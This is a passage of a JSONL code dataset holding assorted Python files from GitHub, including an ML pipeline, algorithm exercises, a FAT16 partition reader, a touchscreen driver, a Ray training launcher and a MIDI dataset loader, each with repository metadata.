[importance[0] for importance in feature_importances]\r\n\r\n return sorted_importances, sorted_features\r\n\r\n\r\ndef extract_scores_dict(res_dict, df_with_scores):\r\n ndatasets = len(df_with_scores)\r\n res_dict['rank_first_pred'], res_dict[\"rank_first_true\"] = df_with_scores['best_predicted_ranking'].values, \\\r\n df_with_scores['best_empirically_ranking'].values\r\n res_dict['spearman_corr'], res_dict['%neighbors'], res_dict['oob'] = df_with_scores['corr'].values, df_with_scores[\r\n 'required_evaluations_0.95'].values, df_with_scores.loc[0, 'oob']\r\n res_dict['f_importance'] = df_with_scores.loc[\r\n 0, df_with_scores.columns[pd.Series(df_with_scores.columns).str.startswith('imp_')]].to_numpy()\r\n\r\n return res_dict, ndatasets\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='arrange data for learning and implement learning algo')\r\n parser.add_argument('--move_type', '-mt', default='prune') # could be 'prune' or 'rgft' or 'merged'\r\n parser.add_argument('--step_number', '-st', required=True) # counting from 1\r\n parser.add_argument('--validation_set', '-val', default=False,\r\n action='store_true') # whether to use validation set INSTEAD of cross validation\r\n parser.add_argument('--all_moves', '-all', default=False,\r\n action='store_true') # necessary only if we want to learn rgft on all\r\n parser.add_argument('--rank_target', '-rank', default=False, action='store_true')\r\n parser.add_argument('--score_for_random', '-random', default=False, action='store_true')\r\n parser.add_argument('--scale_score', '-sscore', default=False, action='store_true')\r\n args = parser.parse_args()\r\n\r\n dirpath = SUMMARY_FILES_DIR if 
platform.system() == 'Linux' else DATA_PATH\r\n    df_orig = pd.read_csv(dirpath + CHOSEN_DATASETS_FILENAME, dtype=types_dict)\r\n\r\n    move_type = args.move_type\r\n    ifrank = \"\" if not args.rank_target else \"_rank\"\r\n    ifall = \"\" if not args.all_moves else \"all_moves_\"\r\n    if not move_type == \"merged\":\r\n        df_path = dirpath + LEARNING_DATA.format(ifall + move_type, str(args.step_number))\r\n        if not os.path.exists(df_path):\r\n            parse_relevant_summaries_for_learning(df_orig, df_path, move_type, args.step_number,\r\n                                                  all_moves=args.all_moves)\r\n    else:  # parse ALL neighbors to create a merged df of all features of all neighbors\r\n        df_path = dirpath + LEARNING_DATA.format(\"all_moves\", str(args.step_number))\r\n        df_prune_features = dirpath + LEARNING_DATA.format(\"all_moves_prune\", str(args.step_number))\r\n        df_rgft_features = dirpath + LEARNING_DATA.format(\"all_moves_rgft\", str(args.step_number))\r\n\r\n        if not os.path.exists(df_path):\r\n            parse_relevant_summaries_for_learning(df_orig, df_prune_features, \"prune\", args.step_number, all_moves=True)\r\n            parse_relevant_summaries_for_learning(df_orig, df_rgft_features, \"rgft\", args.step_number, all_moves=True)\r\n            shared_cols = FEATURES_SHARED + [\"path\", \"prune_name\", \"rgft_name\", \"orig_ds_ll\", \"ll\"]\r\n            complete_df = pd.read_csv(df_prune_features, dtype=types_dict).merge(\r\n                pd.read_csv(df_rgft_features, dtype=types_dict), on=shared_cols, left_index=True, right_index=True,\r\n                suffixes=('_prune', '_rgft'))\r\n            complete_df = complete_df.rename(columns={FEATURES[f]: FEATURES[f] + \"_rgft\" for f in FEATURES_RGFT_ONLY})\r\n            complete_df[LABEL.format(move_type)] = complete_df[LABEL.format(\"prune\")]\r\n            complete_df.to_csv(df_path)\r\n\r\n    df_learnig = pd.read_csv(df_path, dtype=types_dict)\r\n    df_learnig = fit_transform(df_learnig, move_type, rank=args.rank_target)\r\n\r\n    features = FEATURES_PRUNE if move_type == \"prune\" else FEATURES_RGFT if move_type == \"rgft\" else FEATURES_MERGED\r\n    features.remove(FEATURES[GROUP_ID])\r\n    features_to_drop = []\r\n\r\n    ########################\r\n\r\n    for i in range(len(features)):\r\n        suf = \"_validation_set\" if args.validation_set else \"\"\r\n        csv_with_scores = dirpath + SCORES_PER_DS.format(str(len(features)) + suf)\r\n        # df_datasets is needed by print_and_index_results in both branches below\r\n        df_datasets = df_orig if not args.validation_set else pd.read_csv(\r\n            DIRPATH + \"/validation_set2/summary_files/\" + CHOSEN_DATASETS_FILENAME)\r\n        if not os.path.exists(csv_with_scores) or args.validation_set:\r\n            print(\"*@*@*@* scores for {} features are not available, thus applying learning\".format(len(features)))\r\n            res_dict, group_ids = cross_validation_RF(df_learnig, move_type, features,\r\n                                                      validation_set=args.validation_set, random=args.score_for_random,\r\n                                                      scale_score=args.scale_score)\r\n        else:\r\n            res_dict, ndatasets = extract_scores_dict({}, pd.read_csv(csv_with_scores, dtype=types_dict))\r\n        print_and_index_results(df_datasets, res_dict, move_type, args.scale_score, features, args.validation_set)\r\n\r\n        if not FEATURE_SELECTION:\r\n            exit()\r\n        else:\r\n            sorted_importances, sorted_features = sort_features(res_dict, features)\r\n            features = sorted_features[:-1]\r\n            features_to_drop.append(sorted_features[-1])\r\n            print(\"**dropped features:\", 
features_to_drop)\r\n\r\n\r\n\r\n\r\n","repo_name":"ozgranit/PhyAI","sub_path":"ML_workshop_RandomForest_pipline.py","file_name":"ML_workshop_RandomForest_pipline.py","file_ext":"py","file_size_in_byte":19872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22199422252","text":"import sys\nsys.path.append('..')\n\n\nimport asyncio\nimport async_state\nfrom async_state import *\n\nprint('testing async_state')\n\nmotor_state = AsyncState(['deenergized', 'moving', 'stopped_at_target'])\n\nprint(f'The current state is {motor_state}')\nprint(f'All possible states are {motor_state.possible_states}')\n\nasync def state_driver():\n    input_states = ['moving', 'stopped_at_target', 'moving', 'stopped_at_target', 'deenergized']\n    for s in input_states:\n        await asyncio.sleep(1.0)\n        print(f'Going to state {s}')\n        await motor_state.set(s)\n\nasync def state_observer():\n    print(f'Waiting for moving...')\n    await motor_state.wait_for('moving')\n\n    await asyncio.sleep(2.0)\n\n    print(f'Waiting to arrive at target...')\n    await motor_state.wait_for('stopped_at_target')\n\n    await asyncio.sleep(2.0)\n\n    print(f'Waiting to deenergize...')\n    await motor_state.wait_for('deenergized')\n\n    print(f'Done')\n\n\nloop = asyncio.get_event_loop()\n# asyncio.ensure_future(state_driver())\nasyncio.ensure_future(state_observer())\nloop.run_until_complete(state_driver())\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"deniz195/async_state","sub_path":"tests/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40717236995","text":"# https://wwlee94.github.io/category/algorithm/bfs-dfs/travel-route/\nfrom collections import defaultdict\n\ndef dfs(graph, start):\n    route = []\n    need_visit = [start]\n\n    # for each departure, walk its list of arrivals\n    while need_visit:\n        node = need_visit[-1]\n        if not graph[node]:\n            route.append(need_visit.pop())\n        else:\n            need_visit.append(graph[node].pop(0))\n    return route[::-1]\n\ndef solution(tickets):\n    start = \"ICN\"\n    graph = defaultdict(list)\n\n    # build the graph keyed by departure and arrival\n    for departure, arrival in tickets:\n        graph[departure].append(arrival)\n\n    # sort the arrivals of each departure alphabetically\n    for departure in graph.keys():\n        graph[departure].sort()\n\n    return dfs(graph, start)\n\n\nif __name__ == '__main__':\n    tickets_lst = [[[\"ICN\", \"JFK\"], [\"HND\", \"IAD\"], [\"JFK\", \"HND\"]], \\\n                   [[\"ICN\", \"SFO\"], [\"ICN\", \"ATL\"], [\"SFO\", \"ATL\"], [\"ATL\", \"ICN\"], [\"ATL\",\"SFO\"]], \\\n                   [[\"ICN\", \"ATL\"], [\"ATL\", \"HND\"], [\"ATL\", \"IAD\"], ['IAD', 'ATL']]]\n\n    for i, tickets in enumerate(tickets_lst):\n        print(solution(tickets))","repo_name":"vg-rlo/TIL","sub_path":"Algorithm/programmers_travel_route.py","file_name":"programmers_travel_route.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20573209592","text":"\nimport board\nimport adafruit_touchscreen as touchscreen\nimport time\n\n\nclass Touch:\n    def __init__(self, throttle, debug=False):\n        self._touchscreen = touchscreen.Touchscreen(\n            board.TOUCH_XL, board.TOUCH_XR, board.TOUCH_YD, board.TOUCH_YU,\n            calibration=((5200, 59000), (5800, 57000)), size=(320, 240))\n        self._throttle = throttle\n        self._last_touch_time = time.time()\n        self._last_touch = None\n\n    def touch_point(self):\n        now = time.time()\n        elapsed = now - self._last_touch_time\n\n        # sometimes the first point is 
way off\n        # taking the 2 samples that are close together\n        points = []\n        points.append(self._touchscreen.touch_point)\n        points.append(self._touchscreen.touch_point)\n        p0 = points[0]\n        p1 = points[1]\n        while p0 is not None and p1 is not None and abs(p0[0] - p1[0]) > 10:\n            points.pop(0)\n            points.append(self._touchscreen.touch_point)\n            p0 = points[0]\n            p1 = points[1]\n        point = p0\n        if point is not None and elapsed < self._throttle:\n            point = None\n        elif point is not None:\n            self._last_touch_time = now\n\n        return point\n","repo_name":"bbtinkerer/SplatSchedule","sub_path":"src/splatschedule/touch.py","file_name":"touch.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10741184269","text":"\"\"\"\nGiven an array of integers that is already sorted in ascending order, find two numbers such that they add up to a specific target number.\n\nThe function should return the two index values index1 and index2, where index1 must be less than index2.\n\nNote:\nThe returned index values (index1 and index2) are not zero-based.\nYou may assume that each input has exactly one unique answer, and you may not reuse the same element.\n\nExample:\nInput: numbers = [2, 7, 11, 15], target = 9\nOutput: [1,2]\nExplanation: The sum of 2 and 7 equals the target number 9. Therefore index1 = 1, index2 = 2.\n\"\"\"\n\n\nclass Solution:\n    def twoSum(self, numbers: list, target: int) -> list:\n        # binary search\n        if not numbers:\n            return []\n        for i in range(len(numbers)):\n            low = i + 1\n            high = len(numbers) - 1\n            while low < high:\n                mid = (high + low) // 2\n                if numbers[mid] == target - numbers[i]:\n                    return [i+1, mid+1]\n                elif numbers[mid] < target - numbers[i]:\n                    low = mid + 1\n                else:\n                    high = mid - 1\n\n    def twoSum1(self, numbers: list, target: int) -> list:\n        # two pointers converging from both ends\n        if not numbers:\n            return []\n        low = 0\n        high = len(numbers) - 1\n        while low < high:\n            if numbers[low] + numbers[high] == target:\n                return [low + 1, high + 1]\n            elif numbers[low] + numbers[high] < target:\n                low += 1\n            else:\n                high -= 1\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Array-Str/167.two-sum-ii-input-array-is-sorted.py","file_name":"167.two-sum-ii-input-array-is-sorted.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6258799765","text":"# -*- coding: utf-8 -*-\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom leonardo.module.web.models import Widget\n\n\nclass UserRegistrationWidget(Widget):\n\n    def get_context_data(self, request):\n\n        context = super(UserRegistrationWidget, self).get_context_data(request)\n\n        if 'next' in request.GET:\n            context['next'] = request.GET['next']\n\n        return context\n\n    class Meta:\n        abstract = True\n        verbose_name = _(\"user registration\")\n        verbose_name_plural = _(\"user registrations\")\n","repo_name":"django-leonardo/django-leonardo","sub_path":"leonardo/module/leonardo_auth/widget/registration/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"40541187193","text":"\"\"\"generators.py: This script uses Python generator functions.\n   Any function that uses yield is a generator\n\"\"\"\n\n\ndef function():\n    counter = 0\n    while counter < 5:\n        yield counter\n        counter += 1\n\n\nfor x in function():\n    print(x)\n","repo_name":"prajesh-ananthan/PythonMasterClass","sub_path":"section_7--functional_programming/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13852884874","text":"from ..Partition import 
Partition\nfrom ..ClusterChain import ClusterChain\nfrom ..Cluster import Cluster\nfrom ..Sector import Sector\nfrom .FAT16Table import FAT16Table\nfrom .FAT16TableSector import FAT16TableSector\nfrom .FAT16BootSector import FAT16BootSector\nfrom .FAT16Directory import FAT16Directory\nclass FAT16Partition(Partition):\n    def readFAT(self):\n        self.fats = []\n        self.seekSector(self.boot_sector.reserved_sectors)\n\n        for x in range(self.boot_sector.fat_copies):\n            fat = FAT16Table()\n\n            for y in range(self.boot_sector.sectors_per_fat):\n                fat.appendSector(self.readFAT16TableSector())\n\n            self.fats.append(fat)\n        self.fat = self.fats[0]\n\n    def readFAT16TableSector(self,where=None):\n        if where is not None:\n            self.seekSector(where)\n        return FAT16TableSector(self._fh.read(self.boot_sector.bps))\n\n    def readBootSector(self):\n        self.boot_sector = FAT16BootSector(self._fh.read(512))\n\n    def readROOT(self):\n        root_sectors = (self.boot_sector.root_entries*32)//self.boot_sector.bps  # integer division, range() needs an int\n        self.seekSector(self.boot_sector.reserved_sectors + self.boot_sector.sectors_per_fat * self.boot_sector.fat_copies)\n        self.root = FAT16Directory([self.readSector() for x in range(root_sectors)])\n\n    def getClusterChain(self,key):\n        chain = [key]\n        while self.fat[chain[-1]] != self.fat.end_of_cluster_chain:\n            chain.append(self.fat[chain[-1]])\n        return ClusterChain([self.getCluster(x) for x in chain])\n\n    def getCluster(self,key):\n        root_start = self.boot_sector.reserved_sectors + self.boot_sector.sectors_per_fat * self.boot_sector.fat_copies\n        root_size = (self.boot_sector.root_entries*32)//self.boot_sector.bps\n        offset = root_start+root_size-2\n        offset += key\n        return Cluster([self.readSector(offset+x) for x in range(self.boot_sector.spc)])\n\n    def getDirectory(self,key):\n        return FAT16Directory(self.getClusterChain(key))\n","repo_name":"CryptoPunk/FATpy","sub_path":"lib/FATpy/FAT16/FAT16Partition.py","file_name":"FAT16Partition.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"36630667005","text":"import numpy as np\r\nimport os\r\n\r\nfor n in [10,20,30,40,60,80,160,240 ]:\r\n    for m in range(5,35,5):\r\n        filename = os.curdir + f\"/{n}/{m}/output/total.dat\" \r\n        h = open(os.curdir + f\"/{n}/{m}/output/stddev.dat\",'w' )\r\n        k = open(os.curdir + f\"/{n}/{m}.dat\",'w')\r\n        with open(filename,'r') as f:\r\n            data = f.read()\r\n        data = data.split('\\n')\r\n        stdvec = []\r\n        for line in data:\r\n            split = line.split()\r\n            if len(split) < 5:\r\n                break\r\n\r\n            site = split[0]\r\n            vec = [int(split[i]) for i in range(1,len(split))]\r\n            avg = np.average(vec)\r\n            std = np.std(vec)\r\n            h.write(f\"{site} {avg} {std}\\n\")\r\n            k.write(f\"{site} {avg} {std}\\n\")\r\n            stdvec.append(std)\r\n        stdavg = np.average(stdvec)\r\n        h.write(f\"Average standard deviation: {stdavg}\")\r\n        h.close()\r\n        k.close()\r\n\r\n    \r\n","repo_name":"nys1998/DNA-Cohesin-Noise","sub_path":"SiteStandardDeviation.py","file_name":"SiteStandardDeviation.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27119722773","text":"from typing import Optional, TYPE_CHECKING, Type\n\nfrom ayx_python_sdk.providers.e1_provider.e1_input_connection import E1InputConnection\nfrom ayx_python_sdk.providers.e1_provider.records import ParsedRecordContainer\n\nif TYPE_CHECKING:\n    from ayx_python_sdk.core.plugin import Plugin  # noqa: F401\n    from ayx_python_sdk.core.provider_base import 
ProviderBase\n from ayx_python_sdk.providers.e1_provider.connection_interface import (\n ConnectionInterface,\n )\n\n\nclass E1PluginDriver:\n \"\"\"Wrapper around the plugin to expose only interfaces defined for a provider.\"\"\"\n\n def __init__(self, user_plugin_class: Type[\"Plugin\"], provider: \"ProviderBase\"):\n \"\"\"Construct the E1Provider.\"\"\"\n self._provider = provider\n self._user_plugin_class = user_plugin_class\n self._user_plugin: Optional[\"Plugin\"] = None\n\n def initialize_plugin(self) -> None:\n \"\"\"Initialize plugin.\"\"\"\n self._user_plugin = self._user_plugin_class(self._provider)\n\n def initialize_connection(self, connection: \"ConnectionInterface\") -> None:\n \"\"\"Initialize a connection.\"\"\"\n if connection.record_info is None:\n raise RuntimeError(\"Record info must be present before setting containers.\")\n\n if self._user_plugin is None:\n raise ValueError(\"user_plugin hasn't been set.\")\n\n connection.add_record_container(ParsedRecordContainer(connection.record_info))\n self._user_plugin.on_input_connection_opened(E1InputConnection(connection))\n\n def on_record_packet(self, connection: \"ConnectionInterface\") -> None:\n \"\"\"Handle the record packet received through the input connection.\"\"\"\n if self._user_plugin is None:\n raise ValueError(\"user_plugin hasn't been set.\")\n\n self._user_plugin.on_record_packet(E1InputConnection(connection))\n\n def on_complete(self) -> None:\n \"\"\"Close plugin code after all records have finished streaming.\"\"\"\n if self._user_plugin is None:\n raise ValueError(\"user_plugin hasn't been set.\")\n self._user_plugin.on_complete()\n","repo_name":"beesechuuuuurger/gptayx","sub_path":".ayx_cli.cache/dist/ayx_python_sdk/providers/e1_provider/e1_plugin_driver.py","file_name":"e1_plugin_driver.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21148643624","text":"class Interval:\n def __init__(self, start, end):\n self.start, self.end = start, end\n\n def __len__(self):\n return self.end - self.start + 1\n\n def __repr__(self):\n return repr([self.start, self.end])\n\n\nclass Solution:\n def maxRepOpt1(self, text: str) -> int:\n # Time and Space Complexity: O(N)\n\n index = {}\n\n for i in range(len(text)):\n if text[i] not in index:\n index[text[i]] = []\n\n index[text[i]].append(i)\n\n ret = 0\n for char in index:\n ret = max(ret, self.find_longest(index[char]))\n\n return ret\n\n def find_longest(self, occ: List[int]) -> int:\n intervals = []\n\n start = 0\n while start < len(occ):\n end = start\n\n while end + 1 < len(occ) and occ[end + 1] == occ[end] + 1:\n end += 1\n\n intervals.append(Interval(occ[start], occ[end]))\n start = end + 1\n\n if len(intervals) == 1:\n return len(intervals[0])\n else:\n ret = max(map(len, intervals)) + 1\n\n for i in range(len(intervals) - 1):\n if intervals[i].end + 2 == intervals[i + 1].start:\n candidate = len(intervals[i]) + len(intervals[i + 1])\n\n if candidate < len(occ):\n candidate += 1\n\n ret = max(ret, candidate)\n\n return ret\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1156. 
Swap For Longest Repeated Character Substring/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"29604787818","text":"from typing import * \nimport PySimpleGUI as sg\n\n# Settings for you to modify are the size of the element, the circle width & color and the font for the % complete\nGRAPH_SIZE = (300 , 300) # this one setting drives the other settings\n\nclass CircularMeter():\n def __init__(\n self,\n graph: sg.Element,\n init_percent: float = 0.0,\n size: Tuple[int, int] = (200, 200),\n circle_line_width: int = 10,\n circle_line_color: str = \"yellow\",\n text_font: str = \"Courier\",\n text_height: int = 25,\n text_color: str = \"yellow\"\n ):\n self.graph = graph\n self.current_percent = init_percent\n self.size = size\n self.circle_line_width = circle_line_width\n self.circle_line_color = circle_line_color\n self.text_font = text_font\n self.text_color = text_color\n self.text_height = text_height\n self.text_location = (self.size[0]// 2, self.size[1] // 2)\n\n self.update(init_percent)\n\n def update(self, percent_completed):\n self.graph.erase()\n arc_length = percent_completed/100*360+.9\n if arc_length >= 360:\n arc_length = 359.9\n self.graph.draw_arc(\n (self.circle_line_width, self.size[1] - self.circle_line_width), \n (self.size[0] - self.circle_line_width, self.circle_line_width),\n arc_length, 0, 'arc', arc_color=self.circle_line_color, line_width=self.circle_line_width)\n self.current_percent = percent_completed\n self.graph.draw_text(\n f'{self.current_percent:.1f}%', \n self.text_location, \n font=(self.text_font, -self.text_height), color=self.text_color)\n \n\ndef main():\n\n layout = [ [sg.Graph(GRAPH_SIZE, (0,0), GRAPH_SIZE, key='-GRAPH-')],\n [sg.Button('Go')]]\n\n\n window = sg.Window('Circlular Meter', layout, finalize=True)\n\n circular_meter = CircularMeter(window['-GRAPH-'], size=GRAPH_SIZE)\n\n while True:\n event, values = window.read()\n if event == sg.WIN_CLOSED:\n break\n for i in range(500):\n circular_meter.update(i/499*100)\n window.read(timeout=5) # an easy way to make a loop that acts like it has a \"sleep\" in it\n\n window.close()\n\nif __name__ == '__main__':\n main()","repo_name":"ductai199x/celebrity-clips-annotation-gui","sub_path":"circular_meter.py","file_name":"circular_meter.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13516088804","text":"\"\"\"\nProvide string-manipulation functions for regulation paragraphs.\n\nParagraph parsing operations that manipulate paragraph IDs are handled\nby the patterns.IdLevelState class.\n\"\"\"\n\nimport re\n\n\ndef bold_first_italics(graph_text):\n \"\"\"For a newly broken-up graph, convert the first italics text to bold.\"\"\"\n if graph_text.count(\"*\") > 1:\n return graph_text.replace(\"*\", \"**\", 2)\n else:\n return graph_text\n\n\ndef combine_bolds(graph_text):\n \"\"\"\n Make ID marker bold and remove redundant bold markup between bold elements.\n \"\"\"\n if graph_text.startswith(\"(\"):\n graph_text = (\n graph_text.replace(\" \", \" \")\n .replace(\"(\", \"**(\", 1)\n .replace(\")\", \")**\", 1)\n .replace(\"** **\", \" \", 1)\n )\n return graph_text\n\n\ndef graph_top(graph_text):\n \"Weed out the common sources of errant IDs\"\n return (\n graph_text.partition(\"paragraph\")[0]\n .partition(\"12 CFR\")[0]\n .partition(\"\\xa7\")[0][:200]\n 
)\n\n\ndef lint_paragraph(graph_text):\n \"\"\"Clean formatting anomalies.\n\n - Missing em dashes\n - restoring italics\n \"\"\"\n fix1 = restore_emdash(graph_text)\n fix2 = restore_italics(fix1)\n return fix2\n\n\ndef restore_italics(graph_text):\n fix1 = re.sub(\n r\"\\*\\*(see)\\*\\*\", r\"*\\g<1>*\", graph_text, flags=re.IGNORECASE\n )\n fix2 = re.sub(\n r\"\\*\\*(et\\.? seq\\.? ?)\\*\\*?\", r\"*\\g<1>*\", fix1, flags=re.IGNORECASE\n )\n return fix2\n\n\ndef restore_emdash(graph_text):\n stripped = graph_text.rstrip()\n if stripped.endswith(\"-\"):\n return stripped + \"--\\n\"\n return graph_text\n\n\ndef pre_process_tags(paragraph_element):\n \"\"\"\n Convert initial italics-tagged text to markdown bold\n and convert the rest of a paragraph's I tags to markdown italics.\n \"\"\"\n first_tag = paragraph_element.find(\"I\")\n if first_tag:\n bold_content = first_tag.text\n first_tag.replaceWith(\"**{}**\".format(bold_content))\n for element in paragraph_element.find_all(\"I\"):\n i_content = element.text\n element.replaceWith(\"*{}*\".format(i_content))\n return paragraph_element\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/regulations3k/parser/paragraphs.py","file_name":"paragraphs.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"37636915399","text":"from light_malib.utils.logger import Logger\nimport ray\nimport argparse\nfrom light_malib.utils.cfg import load_cfg, convert_to_easydict\nfrom light_malib.utils.random import set_random_seed\nfrom light_malib.framework.pbt_runner import PBTRunner\nimport time\nimport os\nimport yaml\nfrom omegaconf import OmegaConf\n\nimport pathlib\n\nBASE_DIR = str(pathlib.Path(__file__).resolve().parent.parent)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str, required=True)\n args = parser.parse_args()\n return args\n\n\ndef get_local_ip_address():\n import socket\n\n ip_address = socket.gethostbyname(socket.gethostname())\n return ip_address\n\n\ndef start_cluster():\n try:\n cluster_start_info = ray.init(address=\"auto\")\n except ConnectionError:\n Logger.warning(\"No active cluster detected, will create local ray instance.\")\n cluster_start_info = ray.init(resources={})\n\n Logger.warning(\n \"============== Cluster Info ==============\\n{}\".format(cluster_start_info)\n )\n Logger.warning(\"* cluster resources:\\n{}\".format(ray.cluster_resources()))\n Logger.warning(\n \"this worker ip: {}\".format(ray.get_runtime_context().worker.node_ip_address)\n )\n return cluster_start_info\n\n\ndef main():\n args = parse_args()\n cfg = load_cfg(args.config)\n\n set_random_seed(cfg.seed)\n\n assert cfg.distributed.nodes.master.ip is not None\n cluster_start_info = start_cluster()\n\n if cfg.distributed.nodes.master.ip == \"auto\":\n # ip = get_local_ip_address()\n ip = ray.get_runtime_context().worker.node_ip_address\n cfg.distributed.nodes.master.ip = ip\n Logger.warning(\"Automatically set master ip to local ip address: {}\".format(ip))\n\n # check cfg\n # check gpu number here\n assert (\n cfg.training_manager.num_trainers <= ray.cluster_resources()[\"GPU\"]\n ), \"#trainers({}) should be <= #gpus({})\".format(\n cfg.training_manager.num_trainers, ray.cluster_resources()[\"GPU\"]\n )\n # check batch size here\n assert (\n cfg.training_manager.batch_size <= cfg.data_server.table_cfg.capacity\n ), \"batch_size({}) should be <= capacity({})\".format(\n 
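# Sanity check: a sampled batch can never be larger than the replay
# table that feeds it, or the data server would starve the trainers.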
cfg.training_manager.batch_size, cfg.data_server.table_cfg.capacity\n )\n\n timestamp = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime())\n cfg.expr_log_dir = os.path.join(\n cfg.log_dir, cfg.expr_group, cfg.expr_name, timestamp\n )\n cfg.expr_log_dir = os.path.join(BASE_DIR, cfg.expr_log_dir)\n os.makedirs(cfg.expr_log_dir, exist_ok=True)\n\n # copy config file\n yaml_path = os.path.join(cfg.expr_log_dir, \"config.yaml\")\n with open(yaml_path, \"w\") as f:\n f.write(OmegaConf.to_yaml(cfg))\n # yaml.dump(OmegaConf.to_yaml(cfg), f, sort_keys=False)\n\n cfg = convert_to_easydict(cfg)\n\n from light_malib.monitor.monitor import Monitor\n from light_malib.utils.distributed import get_resources\n\n Monitor = ray.remote(**get_resources(cfg.monitor.distributed.resources))(Monitor)\n monitor = Monitor.options(name=\"Monitor\", max_concurrency=100).remote(cfg)\n\n runner = PBTRunner(cfg)\n\n try:\n runner.run()\n except KeyboardInterrupt as e:\n Logger.warning(\n \"Detected KeyboardInterrupt event, start background resources recycling threads ...\"\n )\n finally:\n runner.close()\n ray.get(monitor.close.remote())\n ray.shutdown()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Shanghai-Digital-Brain-Laboratory/DB-Football","sub_path":"light_malib/main_pbt.py","file_name":"main_pbt.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"37"} +{"seq_id":"2295711447","text":"for _ in range(int(input())):\n n = int(input())\n arr = sorted([int(x) for x in input().split()])\n\n answer = 10000 \n for i in range(n-1):\n curr = arr[i+1] - arr[i]\n if curr < answer:\n answer = curr\n\n print(answer)","repo_name":"Soham7777777/CP_July_2023","sub_path":"B_Honest_Coach.py","file_name":"B_Honest_Coach.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70011227949","text":"'''\nThis file defines the dataset of parsed MIDI files that is used for training the models.\n'''\n\nimport os\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.dataset import Dataset, random_split\nimport pytorch_lightning as pl\nfrom constants import BATCH_SIZE\nfrom midi import download_maestro_song_notes, get_maestro_song_notes\n\nNUM_WORKERS = int(os.cpu_count() / 2)\n\nclass SongsDataset(Dataset):\n def __init__(self, songs, seq_len, split_label=False):\n self.seq_len = seq_len\n self.songs = songs\n self.song_idx = 0\n self.songs_switch_idx = 0\n self.note_fields = [\"pitch\", \"step\", \"duration\"]\n self.split_label = split_label\n\n def __len__(self):\n '''\n :return: the number of seq_len-long sequences across all songs\n '''\n total = sum(map(len, self.songs)) - ((self.seq_len + 1) * len(self.songs))\n return total - (total % self.seq_len)\n\n def __getitem__(self, idx):\n '''\n Returns the next sequence of notes; depending on the split_label parameter, the last note may be returned as a second value\n :param idx:\n :return: (seq_len, note_fields_len) or (seq_len-1, note_fields_len) (1, note_fields_len)\n '''\n notes = self.songs[self.song_idx]\n notes_start_idx = idx - self.songs_switch_idx\n\n # when current song notes length is less than required move to the next song\n if notes_start_idx + self.seq_len >= len(notes):\n self.song_idx += 1\n self.songs_switch_idx = idx\n notes_start_idx = 0\n\n notes = self.songs[self.song_idx]\n\n x = notes[notes_start_idx:(notes_start_idx + 
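# Slice one fixed-length window out of the current song; the selected
# note_fields are cast to a float32 array of shape (seq_len, 3) below.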
self.seq_len)]\n x = x[self.note_fields].astype(np.float32).values\n\n if (self.split_label):\n return x[0:self.seq_len-1], x[self.seq_len-1]\n\n return x\n\n\nclass SongsDataModule(pl.LightningDataModule):\n def __init__(\n self,\n batch_size: int = BATCH_SIZE,\n num_workers: int = NUM_WORKERS,\n seq_len=25,\n num_train_songs: int = 2,\n num_val_songs: int = 1,\n num_test_songs: int = 1,\n split_label=False\n ):\n super().__init__()\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.num_train_songs = num_train_songs\n self.num_val_songs = num_val_songs\n self.num_test_songs = num_test_songs\n self.seq_len = seq_len\n self.split_label = split_label\n\n def prepare_data(self):\n # download\n download_maestro_song_notes()\n\n def setup(self, stage=None):\n '''\n Generates the training, validation and test datasets, splitting the data according to the parameters\n :param stage: fit | test\n '''\n if stage == \"fit\" or stage is None:\n songs = get_maestro_song_notes(self.num_train_songs + self.num_val_songs)\n self.songs_train, self.songs_val = random_split(songs, [self.num_train_songs, self.num_val_songs])\n\n self.songs_train = SongsDataset(self.songs_train, self.seq_len, split_label=self.split_label)\n self.songs_val = 